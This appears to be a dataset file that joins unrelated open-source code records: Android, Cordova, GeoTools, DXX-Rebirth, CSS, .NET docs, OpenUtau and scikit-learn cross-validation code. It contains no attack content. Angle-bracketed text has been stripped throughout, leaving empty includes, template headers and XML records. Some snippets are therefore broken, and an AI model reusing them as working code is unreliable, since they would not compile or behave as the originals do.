AppMethodBeat.i(37156);\n for (h hVar : this.bnR) {\n if (hVar.cpx()) {\n hVar.cpa();\n }\n }\n super.cpa();\n AppMethodBeat.o(37156);\n }\n\n public final void cpb() {\n AppMethodBeat.i(37157);\n for (h cpb : this.bnR) {\n cpb.cpb();\n }\n super.cpb();\n AppMethodBeat.o(37157);\n }\n\n public final void cpc() {\n AppMethodBeat.i(37158);\n for (h hVar : this.bnR) {\n if (hVar.cpx()) {\n hVar.cpc();\n }\n }\n super.cpc();\n AppMethodBeat.o(37158);\n }\n\n public final void cps() {\n AppMethodBeat.i(37159);\n for (h hVar : this.bnR) {\n if (hVar.cpx()) {\n hVar.cpa();\n hVar.cpc();\n } else {\n hVar.cpb();\n }\n }\n AppMethodBeat.o(37159);\n }\n\n public final void coZ() {\n AppMethodBeat.i(37160);\n super.coZ();\n for (h coZ : this.bnR) {\n coZ.coZ();\n }\n AppMethodBeat.o(37160);\n }\n\n public final List cpt() {\n AppMethodBeat.i(37161);\n ArrayList arrayList = new ArrayList(this.qZg.cqa());\n AppMethodBeat.o(37161);\n return arrayList;\n }\n\n public final void a(r rVar) {\n AppMethodBeat.i(37162);\n if (rVar instanceof p) {\n this.ral = (p) rVar;\n }\n super.a(rVar);\n AppMethodBeat.o(37162);\n }\n}\n"} {"text": "//\n// HCPXmlConfig.m\n//\n// Created by Nikolay Demyankov on 07.08.15.\n//\n\n#import \"HCPXmlConfig.h\"\n#import \"HCPXmlConfigParser.h\"\n#import \"HCPXmlTags.h\"\n\n@implementation HCPXmlConfig\n\n- (instancetype)init {\n self = [super init];\n if (self) {\n _allowUpdatesAutoDownload = YES;\n _allowUpdatesAutoInstallation = YES;\n _configUrl = nil;\n _nativeInterfaceVersion = 1;\n }\n \n return self;\n}\n\n- (void)mergeOptionsFromJS:(NSDictionary *)jsOptions {\n if (jsOptions[kHCPConfigFileXmlTag]) {\n self.configUrl = [NSURL URLWithString:jsOptions[kHCPConfigFileXmlTag]];\n }\n \n if (jsOptions[kHCPAutoInstallXmlTag]) {\n self.allowUpdatesAutoInstallation = [(NSNumber *)jsOptions[kHCPAutoInstallXmlTag] boolValue];\n }\n \n if (jsOptions[kHCPAutoDownloadXmlTag]) {\n self.allowUpdatesAutoDownload = [(NSNumber *)jsOptions[kHCPAutoDownloadXmlTag] boolValue];\n }\n}\n\n\n+ (instancetype)loadFromCordovaConfigXml {\n return [HCPXmlConfigParser parse];\n}\n\n@end"} {"text": "/*\n * GeoTools - The Open Source Java GIS Toolkit\n * http://geotools.org\n *\n * (C) 2019, Open Source Geospatial Foundation (OSGeo)\n *\n * This library is free software; you can redistribute it and/or\n * modify it under the terms of the GNU Lesser General Public\n * License as published by the Free Software Foundation;\n * version 2.1 of the License.\n *\n * This library is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n * Lesser General Public License for more details.\n *\n */\n\npackage org.geotools.wcs.bindings;\n\nimport javax.xml.namespace.QName;\nimport org.geotools.gml3.GML;\nimport org.geotools.temporal.object.DefaultInstant;\nimport org.geotools.temporal.object.DefaultPeriod;\nimport org.geotools.wcs.WCS;\nimport org.geotools.xsd.AbstractComplexBinding;\nimport org.geotools.xsd.ElementInstance;\nimport org.geotools.xsd.Node;\nimport org.opengis.temporal.Instant;\nimport org.opengis.temporal.Period;\nimport org.opengis.temporal.Position;\nimport org.w3c.dom.Document;\nimport org.w3c.dom.Element;\n\n/**\n * Binding object for the type http://www.opengis.net/wcs:TimePeriodType.\n *\n *

\n *\n *

\n *  \n *  <complexType name="TimePeriodType">\n *      <annotation>\n *          <documentation>This is a variation of the GML TimePeriod, which allows the beginning and end of a time-period to be expressed in short-form inline using the begin/endPosition element, which allows an identifiable TimeInstant to be defined simultaneously with using it, or by reference, using xlinks on the begin/end elements. </documentation>\n *      </annotation>\n *      <sequence>\n *          <element name="beginPosition" type="gml:TimePositionType"/>\n *          <element name="endPosition" type="gml:TimePositionType"/>\n *          <element minOccurs="0" name="timeResolution" type="gml:TimeDurationType"/>\n *      </sequence>\n *      <attribute default="#ISO-8601" name="frame" type="anyURI" use="optional"/>\n *  </complexType>\n *\n * \n *  
\n *\n * @generated\n */\npublic class TimePeriodTypeBinding extends AbstractComplexBinding {\n\n /** @generated */\n public QName getTarget() {\n return WCS.TimePeriodType;\n }\n\n /**\n *\n * \n * \n *\n * @generated modifiable\n */\n public Class getType() {\n return Period.class;\n }\n\n /**\n *\n * \n * \n *\n * @generated modifiable\n */\n public Object parse(ElementInstance instance, Node node, Object value) throws Exception {\n\n Instant begining = new DefaultInstant((Position) node.getChild(\"beginPosition\").getValue());\n Instant ending = new DefaultInstant((Position) node.getChild(\"endPosition\").getValue());\n\n Period timePeriod = new DefaultPeriod(begining, ending);\n\n return timePeriod;\n }\n\n /*\n * (non-Javadoc)\n *\n * @see org.geotools.xsd.AbstractComplexBinding#encode(java.lang.Object,\n * org.w3c.dom.Document, org.w3c.dom.Element)\n */\n @Override\n public Element encode(Object object, Document document, Element value) throws Exception {\n Period timePeriod = (Period) object;\n\n if (timePeriod == null) {\n value.appendChild(document.createElementNS(GML.NAMESPACE, GML.Null.getLocalPart()));\n }\n\n return null;\n }\n\n public Object getProperty(Object object, QName name) {\n Period timePeriod = (Period) object;\n\n if (timePeriod == null) {\n return null;\n }\n\n if (name.getLocalPart().equals(\"beginPosition\")) {\n return timePeriod.getBeginning().getPosition();\n }\n\n if (name.getLocalPart().equals(\"endPosition\")) {\n return timePeriod.getEnding().getPosition();\n }\n\n return null;\n }\n}\n"} {"text": "===========================\n User Guide for github3.py\n===========================\n\nThis section of our documentation is intended to guide you, the user, through\nvarious ways of using the library and to introduce you to some high-level\nconcepts in the library.\n\n\n.. toctree::\n :maxdepth: 2\n\n getting-started\n repositories\n"} {"text": "/*\n * Portions of this file are copyright Rebirth contributors and licensed as\n * described in COPYING.txt.\n * Portions of this file are copyright Parallax Software and licensed\n * according to the Parallax license below.\n * See COPYING.txt for license details.\n\nTHE COMPUTER CODE CONTAINED HEREIN IS THE SOLE PROPERTY OF PARALLAX\nSOFTWARE CORPORATION (\"PARALLAX\"). PARALLAX, IN DISTRIBUTING THE CODE TO\nEND-USERS, AND SUBJECT TO ALL OF THE TERMS AND CONDITIONS HEREIN, GRANTS A\nROYALTY-FREE, PERPETUAL LICENSE TO SUCH END-USERS FOR USE BY SUCH END-USERS\nIN USING, DISPLAYING, AND CREATING DERIVATIVE WORKS THEREOF, SO LONG AS\nSUCH USE, DISPLAY OR CREATION IS FOR NON-COMMERCIAL, ROYALTY OR REVENUE\nFREE PURPOSES. IN NO EVENT SHALL THE END-USER USE THE COMPUTER CODE\nCONTAINED HEREIN FOR REVENUE-BEARING PURPOSES. THE END-USER UNDERSTANDS\nAND AGREES TO THE TERMS HEREIN AND ACCEPTS THE SAME BY USE OF THIS FILE.\nCOPYRIGHT 1993-1999 PARALLAX SOFTWARE CORPORATION. 
ALL RIGHTS RESERVED.\n*/\n\n/*\n *\n * code to swap bytes because of big/little endian problems.\n * contains the macros:\n * SWAP{INT64,INT,SHORT}(x): returns a swapped version of x\n * INTEL_{INT64,INT,SHORT}(x): returns x after conversion to/from little endian\n * GET_INTEL_{INT64,INT,SHORT}(src): gets value from little-endian buffer src\n * PUT_INTEL_{INT64,INT,SHORT}(dest, src): puts src into little-endian buffer dest\n *\n * the GET/PUT macros are safe to use on platforms which segfault on unaligned word access\n *\n */\n\n#pragma once\n\n#include \n#include // for memcpy\n#include \n#include \"dxxsconf.h\"\n#include \"pstypes.h\"\n\nstatic constexpr uint16_t SWAPSHORT(const uint16_t &x)\n{\n#ifdef DXX_HAVE_BUILTIN_BSWAP16\n\treturn __builtin_bswap16(x);\n#else\n\treturn (x << 8) | (x >> 8);\n#endif\n}\n\nstatic constexpr int16_t SWAPSHORT(const int16_t &i)\n{\n\treturn SWAPSHORT(static_cast(i));\n}\n\nstatic constexpr uint32_t SWAPINT(const uint32_t &x)\n{\n#ifdef DXX_HAVE_BUILTIN_BSWAP\n\treturn __builtin_bswap32(x);\n#else\n\treturn (x << 24) | (x >> 24) | ((x & 0xff00) << 8) | ((x >> 8) & 0xff00);\n#endif\n}\n\nstatic constexpr int32_t SWAPINT(const int32_t &i)\n{\n\treturn SWAPINT(static_cast(i));\n}\n\n#if !DXX_WORDS_BIGENDIAN\n#define byteutil_choose_endian(F,a)\t(a)\n#else // ! WORDS_BIGENDIAN\n#define byteutil_choose_endian(F,a)\t(F(a))\n#endif // ! WORDS_BIGENDIAN\nconstexpr std::integral_constant words_bigendian{};\n\n#if DXX_WORDS_NEED_ALIGNMENT\n#define byteutil_unaligned_copy(dt, d, s)\t( DXX_BEGIN_COMPOUND_STATEMENT { dt &destination_reference = d; memcpy(&destination_reference, (s), sizeof(d)); } DXX_END_COMPOUND_STATEMENT )\n#else // WORDS_NEED_ALIGNMENT\n#define byteutil_unaligned_copy(dt, d, s)\t( DXX_BEGIN_COMPOUND_STATEMENT { dt &destination_reference = d; destination_reference = *reinterpret_cast(s); } DXX_END_COMPOUND_STATEMENT )\n#endif // WORDS_NEED_ALIGNMENT\n\nstatic constexpr uint16_t INTEL_SHORT(const uint16_t &x)\n{\n\treturn byteutil_choose_endian(SWAPSHORT, x);\n}\n\nstatic constexpr int16_t INTEL_SHORT(const int16_t &x)\n{\n\treturn byteutil_choose_endian(SWAPSHORT, x);\n}\n\nstatic constexpr uint32_t INTEL_INT(const uint32_t &x)\n{\n\treturn byteutil_choose_endian(SWAPINT, x);\n}\n\nstatic constexpr int32_t INTEL_INT(const int32_t &x)\n{\n\treturn byteutil_choose_endian(SWAPINT, x);\n}\n#undef byteutil_choose_endian\n\ntemplate \nstatic inline uint32_t GET_INTEL_INT(const T *p)\n{\n\tuint32_t u;\n\tbyteutil_unaligned_copy(uint32_t, u, p);\n\treturn INTEL_INT(u);\n}\n\ntemplate \nstatic inline uint16_t GET_INTEL_SHORT(const T *p)\n{\n\tuint16_t u;\n\tbyteutil_unaligned_copy(uint16_t, u, p);\n\treturn INTEL_SHORT(u);\n}\n\ntemplate \nstatic inline void PUT_INTEL_SHORT(uint16_t *d, const T &s)\n{\n\tuint16_t u = INTEL_SHORT(s);\n\tbyteutil_unaligned_copy(uint16_t, *d, &u);\n}\n\ntemplate \nstatic inline void PUT_INTEL_SHORT(uint8_t *d, const T &s)\n{\n\tPUT_INTEL_SHORT(reinterpret_cast(d), s);\n}\n\ntemplate \nstatic inline void PUT_INTEL_INT(uint32_t *d, const T &s)\n{\n\tuint32_t u = INTEL_INT(s);\n\tbyteutil_unaligned_copy(uint32_t, *d, &u);\n}\n\ntemplate \nstatic inline void PUT_INTEL_INT(uint8_t *d, const T &s)\n{\n\tPUT_INTEL_INT(reinterpret_cast(d), s);\n}\n\n#undef byteutil_unaligned_copy\n"} {"text": "@charset \"utf-8\";\n@namespace \"http://www.w3.org/1999/xhtml\";\n\nbody {\n\tfont-family: \"@MS 明朝\", \"@MS Mincho\", \"ヒラギノ明朝 ProN W3\", \"HiraMinProN-W3\", serif, sans-serif;\n\tline-height: <%= line_height %>em !important;\n}\n\n.gtc, .b 
{\n\tfont-family: '@MS ゴシック','@MS Gothic',sans-serif !important;\n}\n\n.b { font-weight: bold; }\n.i { font-style: italic; }\n\nrt { font-size: 0.6em; }\n\n/* カスタム注記用 */\n\n/* 柱(もどき) */\n.running_head {\n\tposition: absolute !important;\n\ttop: 15px;\n\tleft: 10px;\n\tfont-size: 0.8em;\n}\n\n/* 二分アキ */\n.half_em_space { padding-top: 0.5em; }\n\n/* パラメーター(折り返しあり) */\n.custom_parameter_block {\n\tfont-size: 100%;\n\tline-height: 1.2em !important;\n\tborder: 2px solid #000;\n\tborder-radius: 4px;\n\tmargin: 1em 0.5em 1em 0.5em;\n\tpadding: 1em 0.2em 1em 0.2em;\n\tdisplay: inline-block;\n\tfont-family: sans-serif !important;\n\tfont-weight: bold;\n\tbox-shadow: 3px 3px 3px #bbb;\n\t-webkit-box-shadow: 3px 3px 3px #bbb;\n}\n.jzm .custom_parameter_block {\n\tdisplay: block;\n}\n.jzm .p .custom_parameter_block {\n\tdisplay: inline-block;\n}\n\n/* 前書き */\n.introduction {\n\tfloat: right;\n\tfont-size: 83%;\n\tline-height: 1.5em !important;\n\tborder-top: 3px solid #aaa;\n\tcolor: #555;\n\tmargin: 0.25em;\n\tmargin-right: 1em;\n\tpadding: 1em 0.5em 1em 0.5em;\n\tdisplay: inline-block;\n\tfont-family: sans-serif !important;\n\ttext-align: left !important;\n\theight: 70%;\n}\n.jzm .introduction {\n\tdisplay: block;\n}\n.jzm .p .introduction {\n\tdisplay: inline-block;\n}\n\n/* 後書き */\n.postscript {\n\tfloat: right;\n\tfont-size: 83%;\n\tline-height: 1.5em !important;\n\tborder-top: 3px solid #888;\n\tcolor: #222;\n\tmargin: 0.25em;\n\tmargin-right: 2em;\n\tpadding: 1em 0.5em 1em 0.5em;\n\tdisplay: inline-block;\n\tfont-family: sans-serif !important;\n\ttext-align: left !important;\n\theight: 70%;\n}\n.jzm .postscript {\n\tdisplay: block;\n}\n.jzm .p .postscript {\n\tdisplay: inline-block;\n}\n\ndiv.clear {\n\tclear: both;\n}\n"} {"text": "\n \n \n \n \n \n \n \n \n \n \n \n"} {"text": "---\ntitle: XML 架构对象模型 (SOM)\nms.date: 03/30/2017\nms.technology: dotnet-standard\nms.assetid: a897a599-ffd1-43f9-8807-e58c8a7194cd\nms.openlocfilehash: 1de9fdf9950ba3ae356779ca802afb71f24a345e\nms.sourcegitcommit: 33deec3e814238fb18a49b2a7e89278e27888291\nms.translationtype: HT\nms.contentlocale: zh-CN\nms.lasthandoff: 06/02/2020\nms.locfileid: \"84290313\"\n---\n# XML 架构对象模型 (SOM)\nXML 架构是用于在符合该架构的 XML 文档中创建和验证结构的强大而复杂的工具。 与关系数据库中的数据建模类似,架构提供一种定义 XML 文档结构的方法,这种方法是指定可在文档中使用的元素,同时还要指定这些元素必须遵循的结构和类型,以便这些元素对于该特定架构来说是有效的。 \n \n 架构对象模型 (SOM) 在 命名空间中提供一组类,用于从文件读取架构或通过编程创建内存中架构。 然后,架构可以遍历、编辑、编译、验证或写入文件。 \n \n## 本节内容 \n [XML 架构对象模型概述](xml-schema-object-model-overview.md) \n 描述架构对象模型 (SOM) 以及它提供的功能和类。 \n \n [读取和编写 XML 架构](reading-and-writing-xml-schemas.md) \n 描述如何从文件或其他源读取和写入 XML 架构。 \n \n [生成 XML 架构](building-xml-schemas.md) \n 描述如何使用 命名空间中的类来生成内存中 XML 架构。 \n \n [遍历 XML 架构](traversing-xml-schemas.md) \n 描述如何遍历 XML 架构以访问 SOM 中存储的元素、属性和类型。 \n \n [编辑 XML 架构](editing-xml-schemas.md) \n 描述如何编辑 XML 架构。 \n \n [包含或导入 XML 架构](including-or-importing-xml-schemas.md) \n 描述如何包括或导入其他 XML 架构来补充包括或导入这些架构的架构的结构。\n"} {"text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows;\nusing System.Windows.Controls;\nusing System.Windows.Interactivity;\n\nusing WinInterop = System.Windows.Interop;\nusing System.Runtime.InteropServices;\n\nnamespace OpenUtau.UI.Behaviors\n{\n /// \n /// BorderlessWindowBehavior\n /// Hide default window chrome. Fix maximizing problem. 
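It can be attached from a Window's code-behind, for example (a sketch; \"this\" is the hosting Window):\n    ///     Interaction.GetBehaviors(this).Add(new BorderlessWindowBehavior());\n    /// 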
Disable window context menu.\n /// \n class BorderlessWindowBehavior : Behavior\n {\n protected override void OnAttached()\n {\n AddHwndSourceHook();\n base.OnAttached();\n }\n\n void AddHwndSourceHook()\n {\n System.IntPtr handle = (new WinInterop.WindowInteropHelper((Window)AssociatedObject)).EnsureHandle();\n WinInterop.HwndSource.FromHwnd(handle).AddHook(new WinInterop.HwndSourceHook(WindowProc));\n }\n\n private static System.IntPtr WindowProc(\n System.IntPtr hwnd,\n int msg,\n System.IntPtr wParam,\n System.IntPtr lParam,\n ref bool handled)\n {\n switch (msg)\n {\n case 0x0024:/* WM_GETMINMAXINFO */\n WmGetMinMaxInfo(hwnd, lParam);\n handled = true;\n break;\n case 0x0084:/* WM_NCHITTEST */\n if (HitCaptionTest(hwnd, lParam))\n {\n handled = true;\n return (System.IntPtr)2; /*HTCAPTION*/\n }\n break;\n }\n\n return (System.IntPtr)0;\n }\n\n #region Avoid hiding task bar upon maximization\n\n private static void WmGetMinMaxInfo(System.IntPtr hwnd, System.IntPtr lParam)\n {\n\n MINMAXINFO mmi = (MINMAXINFO)Marshal.PtrToStructure(lParam, typeof(MINMAXINFO));\n\n // Adjust the maximized size and position to fit the work area of the correct monitor\n int MONITOR_DEFAULTTONEAREST = 0x00000002;\n System.IntPtr monitor = MonitorFromWindow(hwnd, MONITOR_DEFAULTTONEAREST);\n\n if (monitor != System.IntPtr.Zero)\n {\n\n MONITORINFO monitorInfo = new MONITORINFO();\n GetMonitorInfo(monitor, monitorInfo);\n RECT rcWorkArea = monitorInfo.rcWork;\n RECT rcMonitorArea = monitorInfo.rcMonitor;\n mmi.ptMaxPosition.x = Math.Abs(rcWorkArea.left - rcMonitorArea.left);\n mmi.ptMaxPosition.y = Math.Abs(rcWorkArea.top - rcMonitorArea.top);\n mmi.ptMaxSize.x = Math.Abs(rcWorkArea.right - rcWorkArea.left);\n mmi.ptMaxSize.y = Math.Abs(rcWorkArea.bottom - rcWorkArea.top);\n mmi.ptMinTrackSize.x = 800;\n mmi.ptMinTrackSize.y = 600;\n }\n\n Marshal.StructureToPtr(mmi, lParam, true);\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct POINT\n {\n /// \n /// x coordinate of point.\n /// \n public int x;\n /// \n /// y coordinate of point.\n /// \n public int y;\n\n /// \n /// Construct a point of coordinates (x,y).\n /// \n public POINT(int x, int y)\n {\n this.x = x;\n this.y = y;\n }\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct MINMAXINFO\n {\n public POINT ptReserved;\n public POINT ptMaxSize;\n public POINT ptMaxPosition;\n public POINT ptMinTrackSize;\n public POINT ptMaxTrackSize;\n };\n\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]\n public class MONITORINFO\n {\n public int cbSize = Marshal.SizeOf(typeof(MONITORINFO));\n public RECT rcMonitor = new RECT();\n public RECT rcWork = new RECT();\n public int dwFlags = 0;\n }\n\n [StructLayout(LayoutKind.Sequential, Pack = 0)]\n public struct RECT\n {\n /// Win32 \n public int left;\n /// Win32 \n public int top;\n /// Win32 \n public int right;\n /// Win32 \n public int bottom;\n\n /// Win32 \n public static readonly RECT Empty = new RECT();\n\n /// Win32 \n public int Width\n {\n get { return Math.Abs(right - left); } // Abs needed for BIDI OS\n }\n /// Win32 \n public int Height\n {\n get { return bottom - top; }\n }\n\n /// Win32 \n public RECT(int left, int top, int right, int bottom)\n {\n this.left = left;\n this.top = top;\n this.right = right;\n this.bottom = bottom;\n }\n\n /// Win32 \n public RECT(RECT rcSrc)\n {\n this.left = rcSrc.left;\n this.top = rcSrc.top;\n this.right = rcSrc.right;\n this.bottom = rcSrc.bottom;\n }\n\n /// Win32 \n public bool IsEmpty\n {\n get\n {\n // BUGBUG : On Bidi OS (hebrew 
arabic) left > right\n return left >= right || top >= bottom;\n }\n }\n /// Return a user friendly representation of this struct \n public override string ToString()\n {\n if (this == RECT.Empty) { return \"RECT {Empty}\"; }\n return \"RECT { left : \" + left + \" / top : \" + top + \" / right : \" + right + \" / bottom : \" + bottom + \" }\";\n }\n\n /// Determine if 2 RECT are equal (deep compare) \n public override bool Equals(object obj)\n {\n if (!(obj is Rect)) { return false; }\n return (this == (RECT)obj);\n }\n\n /// Return the HashCode for this struct (not garanteed to be unique)\n public override int GetHashCode()\n {\n return left.GetHashCode() + top.GetHashCode() + right.GetHashCode() + bottom.GetHashCode();\n }\n\n\n /// Determine if 2 RECT are equal (deep compare)\n public static bool operator ==(RECT rect1, RECT rect2)\n {\n return (rect1.left == rect2.left && rect1.top == rect2.top && rect1.right == rect2.right && rect1.bottom == rect2.bottom);\n }\n\n /// Determine if 2 RECT are different(deep compare)\n public static bool operator !=(RECT rect1, RECT rect2)\n {\n return !(rect1 == rect2);\n }\n }\n\n [DllImport(\"user32\")]\n internal static extern bool GetMonitorInfo(IntPtr hMonitor, MONITORINFO lpmi);\n\n [DllImport(\"user32.dll\")]\n static extern bool GetCursorPos(ref Point lpPoint);\n\n [DllImport(\"User32\")]\n internal static extern IntPtr MonitorFromWindow(IntPtr handle, int flags);\n\n #endregion\n\n #region Hit caption test\n\n private static bool HitCaptionTest(System.IntPtr hwnd, System.IntPtr lParam)\n {\n Window window = (Window)WinInterop.HwndSource.FromHwnd(hwnd).RootVisual;\n int x = lParam.ToInt32() << 16 >> 16, y = lParam.ToInt32() >> 16;\n var point = window.PointFromScreen(new Point(x, y));\n if (point.Y > 24) return false; // Skip VisualTreeHelper.HitTest\n var result = System.Windows.Media.VisualTreeHelper.HitTest(window, point);\n var textblock = result.VisualHit as TextBlock;\n return textblock != null && textblock.Name == \"PART_Titlelabel\";\n }\n\n #endregion\n }\n}\n"} {"text": "\n\n\n \n \n \n \n\n \n \n \n \n\n"} {"text": "\"\"\"\nThe :mod:`sklearn.model_selection._split` module includes classes and\nfunctions to split the data based on a preset strategy.\n\"\"\"\n\n# Author: Alexandre Gramfort ,\n# Gael Varoquaux ,\n# Olivier Grisel \n# Raghav R V \n# License: BSD 3 clause\n\n\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport warnings\nfrom itertools import chain, combinations\nfrom collections import Iterable\nfrom math import ceil, floor\nimport numbers\nfrom abc import ABCMeta, abstractmethod\n\nimport numpy as np\n\nfrom scipy.misc import comb\nfrom ..utils import indexable, check_random_state, safe_indexing\nfrom ..utils.validation import _num_samples, column_or_1d\nfrom ..utils.validation import check_array\nfrom ..utils.multiclass import type_of_target\nfrom ..externals.six import with_metaclass\nfrom ..externals.six.moves import zip\nfrom ..utils.fixes import bincount\nfrom ..utils.fixes import signature\nfrom ..utils.random import choice\nfrom ..base import _pprint\nfrom ..gaussian_process.kernels import Kernel as GPKernel\n\n__all__ = ['BaseCrossValidator',\n 'KFold',\n 'GroupKFold',\n 'LeaveOneGroupOut',\n 'LeaveOneOut',\n 'LeavePGroupsOut',\n 'LeavePOut',\n 'ShuffleSplit',\n 'GroupShuffleSplit',\n 'StratifiedKFold',\n 'StratifiedShuffleSplit',\n 'PredefinedSplit',\n 'train_test_split',\n 'check_cv']\n\n\nclass BaseCrossValidator(with_metaclass(ABCMeta)):\n \"\"\"Base class for all 
cross-validators\n\n Implementations must define `_iter_test_masks` or `_iter_test_indices`.\n \"\"\"\n\n def __init__(self):\n # We need this for the build_repr to work properly in py2.7\n # see #6304\n pass\n\n def split(self, X, y=None, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n y : array-like, of length n_samples\n The target variable for supervised learning problems.\n\n groups : array-like, with shape (n_samples,), optional\n Group labels for the samples used while splitting the dataset into\n train/test set.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n X, y, groups = indexable(X, y, groups)\n indices = np.arange(_num_samples(X))\n for test_index in self._iter_test_masks(X, y, groups):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield train_index, test_index\n\n # Since subclasses must implement either _iter_test_masks or\n # _iter_test_indices, neither can be abstract.\n def _iter_test_masks(self, X=None, y=None, groups=None):\n \"\"\"Generates boolean masks corresponding to test sets.\n\n By default, delegates to _iter_test_indices(X, y, groups)\n \"\"\"\n for test_index in self._iter_test_indices(X, y, groups):\n test_mask = np.zeros(_num_samples(X), dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, X=None, y=None, groups=None):\n \"\"\"Generates integer indices corresponding to test sets.\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def get_n_splits(self, X=None, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\"\"\"\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass LeaveOneOut(BaseCrossValidator):\n \"\"\"Leave-One-Out cross-validator\n\n Provides train/test indices to split data in train/test sets. Each\n sample is used once as a test set (singleton) while the remaining\n samples form the training set.\n\n Note: ``LeaveOneOut()`` is equivalent to ``KFold(n_splits=n)`` and\n ``LeavePOut(p=1)`` where ``n`` is the number of samples.\n\n Due to the high number of test sets (which is the same as the\n number of samples) this cross-validation method can be very costly.\n For large datasets one should favor :class:`KFold`, :class:`ShuffleSplit`\n or :class:`StratifiedKFold`.\n\n Read more in the :ref:`User Guide `.\n\n Examples\n --------\n >>> from sklearn.model_selection import LeaveOneOut\n >>> X = np.array([[1, 2], [3, 4]])\n >>> y = np.array([1, 2])\n >>> loo = LeaveOneOut()\n >>> loo.get_n_splits(X)\n 2\n >>> print(loo)\n LeaveOneOut()\n >>> for train_index, test_index in loo.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n ... 
print(X_train, X_test, y_train, y_test)\n TRAIN: [1] TEST: [0]\n [[3 4]] [[1 2]] [2] [1]\n TRAIN: [0] TEST: [1]\n [[1 2]] [[3 4]] [1] [2]\n\n See also\n --------\n LeaveOneGroupOut\n For splitting the data according to explicit, domain-specific\n stratification of the dataset.\n\n GroupKFold: K-fold iterator variant with non-overlapping groups.\n \"\"\"\n\n def _iter_test_indices(self, X, y=None, groups=None):\n return range(_num_samples(X))\n\n def get_n_splits(self, X, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n if X is None:\n raise ValueError(\"The X parameter should not be None\")\n return _num_samples(X)\n\n\nclass LeavePOut(BaseCrossValidator):\n \"\"\"Leave-P-Out cross-validator\n\n Provides train/test indices to split data in train/test sets. This results\n in testing on all distinct samples of size p, while the remaining n - p\n samples form the training set in each iteration.\n\n Note: ``LeavePOut(p)`` is NOT equivalent to\n ``KFold(n_splits=n_samples // p)`` which creates non-overlapping test sets.\n\n Due to the high number of iterations which grows combinatorically with the\n number of samples this cross-validation method can be very costly. For\n large datasets one should favor :class:`KFold`, :class:`StratifiedKFold`\n or :class:`ShuffleSplit`.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n p : int\n Size of the test sets.\n\n Examples\n --------\n >>> from sklearn.model_selection import LeavePOut\n >>> X = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])\n >>> y = np.array([1, 2, 3, 4])\n >>> lpo = LeavePOut(2)\n >>> lpo.get_n_splits(X)\n 6\n >>> print(lpo)\n LeavePOut(p=2)\n >>> for train_index, test_index in lpo.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... 
y_train, y_test = y[train_index], y[test_index]\n TRAIN: [2 3] TEST: [0 1]\n TRAIN: [1 3] TEST: [0 2]\n TRAIN: [1 2] TEST: [0 3]\n TRAIN: [0 3] TEST: [1 2]\n TRAIN: [0 2] TEST: [1 3]\n TRAIN: [0 1] TEST: [2 3]\n \"\"\"\n\n def __init__(self, p):\n self.p = p\n\n def _iter_test_indices(self, X, y=None, groups=None):\n for combination in combinations(range(_num_samples(X)), self.p):\n yield np.array(combination)\n\n def get_n_splits(self, X, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n \"\"\"\n if X is None:\n raise ValueError(\"The X parameter should not be None\")\n return int(comb(_num_samples(X), self.p, exact=True))\n\n\nclass _BaseKFold(with_metaclass(ABCMeta, BaseCrossValidator)):\n \"\"\"Base class for KFold, GroupKFold, and StratifiedKFold\"\"\"\n\n @abstractmethod\n def __init__(self, n_splits, shuffle, random_state):\n if not isinstance(n_splits, numbers.Integral):\n raise ValueError('The number of folds must be of Integral type. '\n '%s of type %s was passed.'\n % (n_splits, type(n_splits)))\n n_splits = int(n_splits)\n\n if n_splits <= 1:\n raise ValueError(\n \"k-fold cross-validation requires at least one\"\n \" train/test split by setting n_splits=2 or more,\"\n \" got n_splits={0}.\".format(n_splits))\n\n if not isinstance(shuffle, bool):\n raise TypeError(\"shuffle must be True or False;\"\n \" got {0}\".format(shuffle))\n\n self.n_splits = n_splits\n self.shuffle = shuffle\n self.random_state = random_state\n\n def split(self, X, y=None, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n y : array-like, shape (n_samples,)\n The target variable for supervised learning problems.\n\n groups : array-like, with shape (n_samples,), optional\n Group labels for the samples used while splitting the dataset into\n train/test set.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n X, y, groups = indexable(X, y, groups)\n n_samples = _num_samples(X)\n if self.n_splits > n_samples:\n raise ValueError(\n (\"Cannot have number of splits 